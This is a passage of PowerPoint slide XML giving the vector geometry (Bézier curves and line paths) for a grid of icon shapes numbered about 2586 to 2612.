                  <a:pt x="10469" y="5891"/>
                  <a:pt x="10200" y="5672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4"/>
                  <a:pt x="6118" y="5617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7"/>
                  <a:pt x="18593" y="4894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5" name="Shape 2586"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810214" y="207030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6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6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6"/>
                  <a:pt x="15600" y="6076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8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8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15600" y="7318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1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2"/>
                  <a:pt x="7200" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7200" y="15929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4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4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6" name="Shape 2587"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318082" y="20703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7" name="Shape 2588"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7851343" y="2083004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20"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16368" y="12420"/>
                  <a:pt x="15709" y="11694"/>
                  <a:pt x="15709" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="9906"/>
                  <a:pt x="16368" y="9180"/>
                  <a:pt x="17182" y="9180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17995" y="9180"/>
                  <a:pt x="18655" y="9906"/>
                  <a:pt x="18655" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="11694"/>
                  <a:pt x="17995" y="12420"/>
                  <a:pt x="17182" y="12420"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="21109" y="10260"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19587" y="10260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0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="491" y="10260"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="10260"/>
                  <a:pt x="0" y="10502"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="11098"/>
                  <a:pt x="220" y="11340"/>
                  <a:pt x="491" y="11340"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14777" y="11340"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15004" y="12572"/>
                  <a:pt x="15994" y="13500"/>
                  <a:pt x="17182" y="13500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18369" y="13500"/>
                  <a:pt x="19360" y="12572"/>
                  <a:pt x="19587" y="11340"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21109" y="11340"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21380" y="11340"/>
                  <a:pt x="21600" y="11098"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="10502"/>
                  <a:pt x="21380" y="10260"/>
                  <a:pt x="21109" y="10260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2"/>
                  <a:pt x="4213" y="5400"/>
                  <a:pt x="5400" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6587" y="5400"/>
                  <a:pt x="7578" y="4472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9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9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1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1"/>
                  <a:pt x="21380" y="18359"/>
                  <a:pt x="21109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8" name="Shape 2589"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8384604" y="2083004"/>
            <a:ext cx="279328" cy="253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4"/>
                  <a:pt x="7855" y="13500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="12605"/>
                  <a:pt x="7195" y="11880"/>
                  <a:pt x="6382" y="11880"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5568" y="11880"/>
                  <a:pt x="4909" y="12605"/>
                  <a:pt x="4909" y="13500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="14394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9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9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500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500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="13500"/>
                  <a:pt x="3927" y="8100"/>
                  <a:pt x="3927" y="8100"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2945" y="13500"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="15587"/>
                  <a:pt x="4484" y="17279"/>
                  <a:pt x="6382" y="17279"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8280" y="17279"/>
                  <a:pt x="9818" y="15587"/>
                  <a:pt x="9818" y="13500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500"/>
                  <a:pt x="2945" y="13500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1"/>
                  <a:pt x="2725" y="18359"/>
                  <a:pt x="2455" y="18359"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2184" y="18359"/>
                  <a:pt x="1964" y="18601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9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9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500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500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="13500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7"/>
                  <a:pt x="18655" y="13500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500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="15587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6"/>
                  <a:pt x="16032" y="6480"/>
                  <a:pt x="15218" y="6480"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14405" y="6480"/>
                  <a:pt x="13745" y="7206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1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1"/>
                  <a:pt x="19416" y="18359"/>
                  <a:pt x="19145" y="1835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79" name="Shape 2590"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8917865" y="20703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29"/>
                  <a:pt x="2945" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="5672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2"/>
                  <a:pt x="18655" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="5129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29"/>
                  <a:pt x="2945" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="11072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2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2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2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0" name="Shape 2591"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9451126" y="20703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1" name="Shape 2592"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984387" y="20703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2" name="Shape 2593"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10517648" y="207030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0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7"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17052" y="7203"/>
                  <a:pt x="16911" y="7035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3"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13102" y="7716"/>
                  <a:pt x="12995" y="8125"/>
                  <a:pt x="12977" y="8495"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12996" y="9570"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12293" y="9973"/>
                  <a:pt x="11639" y="10471"/>
                  <a:pt x="11053" y="11057"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10023" y="10762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29"/>
                  <a:pt x="7863" y="14504"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8633" y="15248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3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3"/>
                  <a:pt x="5164" y="8590"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6091" y="9146"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6275" y="9241"/>
                  <a:pt x="6484" y="9317"/>
                  <a:pt x="6681" y="9317"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6837" y="9317"/>
                  <a:pt x="6985" y="9270"/>
                  <a:pt x="7110" y="9146"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9146" y="7109"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9427" y="6828"/>
                  <a:pt x="9332" y="6404"/>
                  <a:pt x="9146" y="6091"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8593" y="5169"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8999" y="4469"/>
                  <a:pt x="9317" y="3711"/>
                  <a:pt x="9531" y="2911"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10571" y="2651"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10924" y="2538"/>
                  <a:pt x="11291" y="2328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2"/>
                  <a:pt x="17673" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14419" y="11782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1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9298" y="16938"/>
                  <a:pt x="9392" y="16208"/>
                  <a:pt x="9582" y="15502"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9674" y="15158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3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7"/>
                  <a:pt x="13485" y="10421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13794" y="10243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3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16304" y="7875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16817" y="8799"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16905" y="8958"/>
                  <a:pt x="17032" y="9085"/>
                  <a:pt x="17184" y="9172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399"/>
                  <a:pt x="19837" y="9589"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20106" y="9660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6"/>
                  <a:pt x="18233" y="15709"/>
                  <a:pt x="17673" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17113" y="15709"/>
                  <a:pt x="16610" y="15946"/>
                  <a:pt x="16253" y="16323"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13643" y="14873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14530" y="13599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8"/>
                  <a:pt x="19636" y="18587"/>
                  <a:pt x="19636" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="17502"/>
                  <a:pt x="19608" y="17339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6"/>
                  <a:pt x="13165" y="15730"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15779" y="17182"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15738" y="17339"/>
                  <a:pt x="15709" y="17502"/>
                  <a:pt x="15709" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="18587"/>
                  <a:pt x="16336" y="19348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6"/>
                  <a:pt x="10298" y="1707"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9293" y="1958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6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7564" y="4986"/>
                  <a:pt x="7567" y="5368"/>
                  <a:pt x="7751" y="5674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6"/>
                  <a:pt x="2047" y="8938"/>
                  <a:pt x="1960" y="9285"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1707" y="10298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1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2"/>
                  <a:pt x="982" y="4384"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="4384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3" name="Shape 2594"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11050909" y="2095701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1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1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7"/>
                  <a:pt x="5078" y="18000"/>
                  <a:pt x="5891" y="18000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6704" y="18000"/>
                  <a:pt x="7364" y="18807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7"/>
                  <a:pt x="14896" y="18000"/>
                  <a:pt x="15709" y="18000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16523" y="18000"/>
                  <a:pt x="17182" y="18807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69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69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4" name="Shape 2595"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251560" y="2616265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9"/>
                  <a:pt x="14727" y="13500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="13202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2"/>
                  <a:pt x="6873" y="13500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="13799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9"/>
                  <a:pt x="18655" y="11340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="11042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2"/>
                  <a:pt x="6873" y="11340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="11639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9"/>
                  <a:pt x="7855" y="19980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="19085"/>
                  <a:pt x="8514" y="18360"/>
                  <a:pt x="9327" y="18360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10141" y="18360"/>
                  <a:pt x="10800" y="19085"/>
                  <a:pt x="10800" y="19980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="20279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9"/>
                  <a:pt x="14727" y="19980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="19085"/>
                  <a:pt x="15386" y="18360"/>
                  <a:pt x="16200" y="18360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17014" y="18360"/>
                  <a:pt x="17673" y="19085"/>
                  <a:pt x="17673" y="19980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="20279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9"/>
                  <a:pt x="18655" y="9180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="8882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2"/>
                  <a:pt x="6873" y="9180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="9479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2"/>
                  <a:pt x="8836" y="19980"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8836" y="21060"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="21359"/>
                  <a:pt x="9056" y="21600"/>
                  <a:pt x="9327" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9598" y="21600"/>
                  <a:pt x="9818" y="21359"/>
                  <a:pt x="9818" y="21060"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9818" y="19980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="19682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9"/>
                  <a:pt x="16911" y="3240"/>
                  <a:pt x="17182" y="3240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17453" y="3240"/>
                  <a:pt x="17673" y="2999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9"/>
                  <a:pt x="2945" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="15362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2"/>
                  <a:pt x="15709" y="19980"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15709" y="21060"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="21359"/>
                  <a:pt x="15929" y="21600"/>
                  <a:pt x="16200" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16471" y="21600"/>
                  <a:pt x="16691" y="21359"/>
                  <a:pt x="16691" y="21060"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16691" y="19980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="19682"/>
                  <a:pt x="16471" y="19440"/>
                  <a:pt x="16200" y="194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5" name="Shape 2596"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6784821" y="2641659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6" name="Shape 2597"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318082" y="2628962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69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69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69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69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69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69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69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69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69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69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69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69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69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69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69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69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7" name="Shape 2598"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7851343" y="2628962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69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69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1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1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1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1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69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69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69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69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1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1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1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1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1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1"/>
                  <a:pt x="10038" y="4800"/>
                  <a:pt x="10309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8" name="Shape 2599"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8384604" y="26035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8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8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2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2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0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0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8"/>
                  <a:pt x="13745" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="10581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1"/>
                  <a:pt x="18655" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="10038"/>
                  <a:pt x="18434" y="9818"/>
                  <a:pt x="18164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89" name="Shape 2600"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8917865" y="26035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2"/>
                  <a:pt x="10529" y="16691"/>
                  <a:pt x="10800" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11071" y="16691"/>
                  <a:pt x="11291" y="16472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0" name="Shape 2601"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9451126" y="260356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29"/>
                  <a:pt x="4909" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="11072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2"/>
                  <a:pt x="16691" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="10529"/>
                  <a:pt x="16471" y="10309"/>
                  <a:pt x="16200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1" name="Shape 2602"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984387" y="2628962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69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69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69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69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69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69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69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2" name="Shape 2603"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10517648" y="2616265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9"/>
                  <a:pt x="15218" y="17820"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15218" y="17522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2"/>
                  <a:pt x="13255" y="17820"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13255" y="18119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9"/>
                  <a:pt x="4418" y="17820"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4418" y="17522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2"/>
                  <a:pt x="2455" y="17820"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2455" y="18119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9"/>
                  <a:pt x="4147" y="5400"/>
                  <a:pt x="4418" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4690" y="5400"/>
                  <a:pt x="4909" y="5159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9"/>
                  <a:pt x="6873" y="11341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="11042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2"/>
                  <a:pt x="4909" y="11341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="11639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9"/>
                  <a:pt x="8836" y="9181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="8882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2"/>
                  <a:pt x="4909" y="9181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="9479"/>
                  <a:pt x="5129" y="9720"/>
                  <a:pt x="5400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3" name="Shape 2604"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11050909" y="2628962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4" name="Shape 2605"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251559" y="3136830"/>
            <a:ext cx="279460" cy="2794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4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7"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10221" y="13409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8"/>
                  <a:pt x="877" y="7133"/>
                  <a:pt x="1256" y="6753"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6754" y="1255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7133" y="876"/>
                  <a:pt x="7749" y="876"/>
                  <a:pt x="8128" y="1255"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14312" y="7440"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14691" y="7820"/>
                  <a:pt x="14691" y="8435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0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13370" y="10084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4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4999"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7513" y="15758"/>
                  <a:pt x="8743" y="15758"/>
                  <a:pt x="9502" y="14999"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9968" y="14533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12798" y="17376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3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3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6"/>
                  <a:pt x="5846" y="6819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19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7792" y="7356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19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19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5" name="Shape 2606"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6784821" y="31368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1"/>
                  <a:pt x="10580" y="10800"/>
                  <a:pt x="10309" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10038" y="10800"/>
                  <a:pt x="9818" y="10581"/>
                  <a:pt x="9818" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="10038"/>
                  <a:pt x="10038" y="9818"/>
                  <a:pt x="10309" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10580" y="9818"/>
                  <a:pt x="10800" y="10038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6"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12761" y="14997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3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6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6"/>
                  <a:pt x="11752" y="10012"/>
                  <a:pt x="11709" y="9873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12146" y="9210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3"/>
                  <a:pt x="14957" y="12341"/>
                  <a:pt x="14957" y="12487"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14957" y="12623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90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3"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5474" y="9058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7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1"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10511" y="16870"/>
                  <a:pt x="11735" y="16875"/>
                  <a:pt x="12503" y="16130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1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lnTo>
                  <a:pt x="21600" y="18164"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="18029"/>
                  <a:pt x="21545" y="17906"/>
                  <a:pt x="21456" y="178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6" name="Shape 2607"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318082" y="3162223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3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3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5"/>
                  <a:pt x="21600" y="2399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="1074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cubicBezTo>
                  <a:pt x="0" y="3725"/>
                  <a:pt x="879" y="4799"/>
                  <a:pt x="1964" y="4799"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="19636" y="12000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1964" y="12000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1422" y="12000"/>
                  <a:pt x="982" y="11463"/>
                  <a:pt x="982" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="10137"/>
                  <a:pt x="1422" y="9600"/>
                  <a:pt x="1964" y="9600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="9600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20178" y="9600"/>
                  <a:pt x="20618" y="10137"/>
                  <a:pt x="20618" y="10800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0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7" name="Shape 2608"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7851343" y="316222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6"/>
                  <a:pt x="879" y="4800"/>
                  <a:pt x="1964" y="4800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3048" y="4800"/>
                  <a:pt x="3927" y="3726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6"/>
                  <a:pt x="879" y="13200"/>
                  <a:pt x="1964" y="13200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3048" y="13200"/>
                  <a:pt x="3927" y="12126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6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6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6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6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6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cubicBezTo>
                  <a:pt x="3048" y="21600"/>
                  <a:pt x="3927" y="20526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8" name="Shape 2609"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8384604" y="316222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69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69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69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69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7"/>
                  <a:pt x="0" y="1800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2794"/>
                  <a:pt x="659" y="3600"/>
                  <a:pt x="1473" y="3600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2286" y="3600"/>
                  <a:pt x="2945" y="2794"/>
                  <a:pt x="2945" y="1800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="807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69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69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69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69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4"/>
                  <a:pt x="659" y="21600"/>
                  <a:pt x="1473" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2286" y="21600"/>
                  <a:pt x="2945" y="20794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7"/>
                  <a:pt x="0" y="7800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="8794"/>
                  <a:pt x="659" y="9600"/>
                  <a:pt x="1473" y="9600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2286" y="9600"/>
                  <a:pt x="2945" y="8794"/>
                  <a:pt x="2945" y="7800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="6807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7"/>
                  <a:pt x="0" y="13800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14794"/>
                  <a:pt x="659" y="15600"/>
                  <a:pt x="1473" y="15600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2286" y="15600"/>
                  <a:pt x="2945" y="14794"/>
                  <a:pt x="2945" y="13800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="12807"/>
                  <a:pt x="2286" y="12000"/>
                  <a:pt x="1473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9" name="Shape 2610"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8917865" y="3162223"/>
            <a:ext cx="279328" cy="228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800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="4800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200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="7200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="7200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800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0" name="Shape 2611"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9451126" y="3149526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9"/>
                  <a:pt x="4147" y="3240"/>
                  <a:pt x="4418" y="3240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4690" y="3240"/>
                  <a:pt x="4909" y="2999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39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9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1" name="Shape 2612"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984387" y="3162223"/>
            <a:ext cx="279328" cy="22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2"/>
                  <a:pt x="11071" y="14400"/>
                  <a:pt x="10800" y="14400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10529" y="14400"/>
                  <a:pt x="10309" y="14132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4"/>
                  <a:pt x="12273" y="13800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="12806"/>
                  <a:pt x="11613" y="12000"/>
                  <a:pt x="10800" y="12000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9987" y="12000"/>
                  <a:pt x="9327" y="12806"/>
                  <a:pt x="9327" y="13800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="14794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2"/>
                  <a:pt x="5671" y="14400"/>
                  <a:pt x="5400" y="14400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5129" y="14400"/>
                  <a:pt x="4909" y="14132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4"/>
                  <a:pt x="6873" y="13800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="12806"/>
                  <a:pt x="6213" y="12000"/>
                  <a:pt x="5400" y="12000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4587" y="12000"/>
                  <a:pt x="3927" y="12806"/>
                  <a:pt x="3927" y="13800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="14794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4"/>
                  <a:pt x="0" y="2399"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="19200"/>
                </a:ln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2"/>
                  <a:pt x="16471" y="14400"/>
                  <a:pt x="16200" y="14400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15929" y="14400"/>
                  <a:pt x="15709" y="14132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4"/>
                  <a:pt x="17673" y="13800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="12806"/>
                  <a:pt x="17013" y="12000"/>
                  <a:pt x="16200" y="12000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15387" y="12000"/>
                  <a:pt x="14727" y="12806"/>
                  <a:pt x="14727" y="13800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="14794"/>
                  <a:pt x="15387" y="15600"/>
